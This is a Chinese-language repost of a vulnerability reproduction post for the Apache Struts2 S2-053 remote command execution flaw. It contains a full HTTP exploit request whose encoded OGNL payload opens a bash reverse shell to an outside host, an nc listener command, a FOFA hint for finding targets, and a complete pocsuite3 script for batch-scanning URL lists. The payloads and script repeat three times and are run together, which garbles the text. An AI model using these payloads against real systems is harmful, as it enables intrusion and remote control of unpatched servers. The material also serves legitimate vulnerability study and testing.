本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-Struts2-053 远程命令执行漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用JavaServlet/JSP技术,实现了基于JavaEEWeb应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。在Struts2-053中,当开发者在Freemarker标签中使用如下代码时<@s.hidden name=”redirectUri” value=redirectUri />,<@s.hidden name=”redirectUri” value=”${redirectUri}” />,Freemarker会将值当做表达式进行执行,最后导致代码执行。
![图片[1]--Struts2-053 远程命令执行漏洞-安全小天地](d2b5ca33bd192635.png)
0x03 漏洞复现
漏洞影响:Struts 2.0.1-2.3.33 Struts 2.5-2.5.10
FOFA:Struts2
1.构造exp执行反弹shell命令
POST /hello.action HTTP/1.1Host: x.x.x.x:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 884Origin: http://x.x.x.x:8080DNT: 1Connection: closeReferer: http://x.x.x.x:8080/hello.actionCookie: JSESSIONID=725C0B09B04404D9769BD21204F2F6CEUpgrade-Insecure-Requests: 1redirectUri=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B\'com.opensymphony.xwork2.ActionContext.container\'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D\'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fx.x.x.x%2F7777%200%3E%261\').(%23iswin%3D(%40java.lang.System%40getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(%23cmds%3D(%23iswin%3F%7B\'cmd.exe\'%2C\'%2Fc\'%2C%23cmd%7D%3A%7B\'%2Fbin%2Fbash\'%2C\'-c\'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0APOST /hello.action HTTP/1.1 Host: x.x.x.x:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 884 Origin: http://x.x.x.x:8080 DNT: 1 Connection: close Referer: http://x.x.x.x:8080/hello.action Cookie: JSESSIONID=725C0B09B04404D9769BD21204F2F6CE Upgrade-Insecure-Requests: 1 redirectUri=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B\'com.opensymphony.xwork2.ActionContext.container\'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D\'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fx.x.x.x%2F7777%200%3E%261\').(%23iswin%3D(%40java.lang.System%40getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(%23cmds%3D(%23iswin%3F%7B\'cmd.exe\'%2C\'%2Fc\'%2C%23cmd%7D%3A%7B\'%2Fbin%2Fbash\'%2C\'-c\'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0APOST /hello.action HTTP/1.1 Host: x.x.x.x:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 884 Origin: http://x.x.x.x:8080 DNT: 1 Connection: close Referer: http://x.x.x.x:8080/hello.action Cookie: JSESSIONID=725C0B09B04404D9769BD21204F2F6CE Upgrade-Insecure-Requests: 1 redirectUri=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B\'com.opensymphony.xwork2.ActionContext.container\'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D\'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fx.x.x.x%2F7777%200%3E%261\').(%23iswin%3D(%40java.lang.System%40getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(%23cmds%3D(%23iswin%3F%7B\'cmd.exe\'%2C\'%2Fc\'%2C%23cmd%7D%3A%7B\'%2Fbin%2Fbash\'%2C\'-c\'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A
![图片[2]--Struts2-053 远程命令执行漏洞-安全小天地](https://img.godyu.com/2023/12/20231226125036215.png?imageView2/0/format/webp/q/75)
2.nc监听,得到一个shell
nc.exe -lvvp 7777nc.exe -lvvp 7777nc.exe -lvvp 7777
![图片[3]--Struts2-053 远程命令执行漏洞-安全小天地](https://img.godyu.com/2023/12/20231226205038934.png?imageView2/0/format/webp/q/75)
3.使用pocsuite3批量验证1.txt文件中的url是否存在该漏洞,显示一个成功一个失败。
pocsuite3下载地址:https://github.com/knownsec/pocsuite3
使用方法:python3 cli.py -r pocs/struts2-053-poc.py -f 1.txtpoc:# -*- coding:utf-8 -*-from pocsuite3.api import Output, POCBase, register_poc, requests, loggerfrom pocsuite3.api import get_listener_ip, get_listener_portfrom pocsuite3.api import REVERSE_PAYLOADfrom urllib.parse import urljoinfrom pocsuite3.lib.utils import random_strclass DemoPOC(POCBase):vulID = \"CVE-2017-12611\"version =\'2.0.1-2.3.33,2.5-2.5.10\'author = [\"ry\"]vulDate = \"2019-12-27\"createDate = \"2019-12-27\"updateDate = \"2019-12-27\"references =[\"https://vulhub.org/#/environments/struts2/s2-053/\"]name =\"S2-053 Remote Code Execution Vulnerablity\"appPowerLink = \'\'appName = \'Strute2\'appVersion = \'2.x\'vulType = \'RCE\'desc = \'\'\'struts2-053远程代码执行漏洞\'\'\'samples = []install_requires = [\'\']def _verify(self):result = {}path = \"/hello.action\"url = urljoin(self.url,path)payload = \"redirectUri=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B\'com.opensymphony.xwork2.ActionContext.container\'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D\'echo%20ry\').(%23iswin%3D(%40java.lang.System%40getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(%23cmds%3D(%23iswin%3F%7B\'cmd.exe\'%2C\'%2Fc\'%2C%23cmd%7D%3A%7B\'%2Fbin%2Fbash\'%2C\'-c\'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A\"headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0\',\'Content-Type\': \'application/x-www-form-urlencoded\'}rr = requests.post(url=url,headers=headers,data=payload)try:if \"ry\" in rr.text:result[\'VerifyInfo\'] = {}result[\'VerifyInfo\'][\'URL\'] = urlresult[\'VerifyInfo\'][\'Name\'] = payloadexcept Exception as e:passreturn self.parse_output(result)def parse_output(self, result):output = Output(self)if result:output.success(result)else:output.fail(\'target is not vulnerable\')return outputdef _attack(self):return self._verify()register_poc(DemoPOC)使用方法: python3 cli.py -r pocs/struts2-053-poc.py -f 1.txt poc: # -*- coding:utf-8 -*- from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from urllib.parse import urljoin from pocsuite3.lib.utils import random_str class DemoPOC(POCBase): vulID = \"CVE-2017-12611\" version =\'2.0.1-2.3.33,2.5-2.5.10\' author = [\"ry\"] vulDate = \"2019-12-27\" createDate = \"2019-12-27\" updateDate = \"2019-12-27\" references =[\"https://vulhub.org/#/environments/struts2/s2-053/\"] name =\"S2-053 Remote Code Execution Vulnerablity\" appPowerLink = \'\' appName = \'Strute2\' appVersion = \'2.x\' vulType = \'RCE\' desc = \'\'\' struts2-053远程代码执行漏洞 \'\'\' samples = [] install_requires = [\'\'] def _verify(self): result = {} path = \"/hello.action\" url = urljoin(self.url,path) payload = \"redirectUri=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B\'com.opensymphony.xwork2.ActionContext.container\'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D\'echo%20ry\').(%23iswin%3D(%40java.lang.System%40getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(%23cmds%3D(%23iswin%3F%7B\'cmd.exe\'%2C\'%2Fc\'%2C%23cmd%7D%3A%7B\'%2Fbin%2Fbash\'%2C\'-c\'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A\" headers = { \'User-Agent\': \'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0\', \'Content-Type\': \'application/x-www-form-urlencoded\' } rr = requests.post(url=url,headers=headers,data=payload) try: if \"ry\" in rr.text: result[\'VerifyInfo\'] = {} result[\'VerifyInfo\'][\'URL\'] = url result[\'VerifyInfo\'][\'Name\'] = payload except Exception as e: pass return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail(\'target is not vulnerable\') return output def _attack(self): return self._verify() register_poc(DemoPOC)使用方法: python3 cli.py -r pocs/struts2-053-poc.py -f 1.txt poc: # -*- coding:utf-8 -*- from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from urllib.parse import urljoin from pocsuite3.lib.utils import random_str class DemoPOC(POCBase): vulID = \"CVE-2017-12611\" version =\'2.0.1-2.3.33,2.5-2.5.10\' author = [\"ry\"] vulDate = \"2019-12-27\" createDate = \"2019-12-27\" updateDate = \"2019-12-27\" references =[\"https://vulhub.org/#/environments/struts2/s2-053/\"] name =\"S2-053 Remote Code Execution Vulnerablity\" appPowerLink = \'\' appName = \'Strute2\' appVersion = \'2.x\' vulType = \'RCE\' desc = \'\'\' struts2-053远程代码执行漏洞 \'\'\' samples = [] install_requires = [\'\'] def _verify(self): result = {} path = \"/hello.action\" url = urljoin(self.url,path) payload = \"redirectUri=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B\'com.opensymphony.xwork2.ActionContext.container\'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D\'echo%20ry\').(%23iswin%3D(%40java.lang.System%40getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(%23cmds%3D(%23iswin%3F%7B\'cmd.exe\'%2C\'%2Fc\'%2C%23cmd%7D%3A%7B\'%2Fbin%2Fbash\'%2C\'-c\'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A\" headers = { \'User-Agent\': \'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0\', \'Content-Type\': \'application/x-www-form-urlencoded\' } rr = requests.post(url=url,headers=headers,data=payload) try: if \"ry\" in rr.text: result[\'VerifyInfo\'] = {} result[\'VerifyInfo\'][\'URL\'] = url result[\'VerifyInfo\'][\'Name\'] = payload except Exception as e: pass return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail(\'target is not vulnerable\') return output def _attack(self): return self._verify() register_poc(DemoPOC)
![图片[4]--Struts2-053 远程命令执行漏洞-安全小天地](d2b5ca33bd164230.png)
THE END
暂无评论内容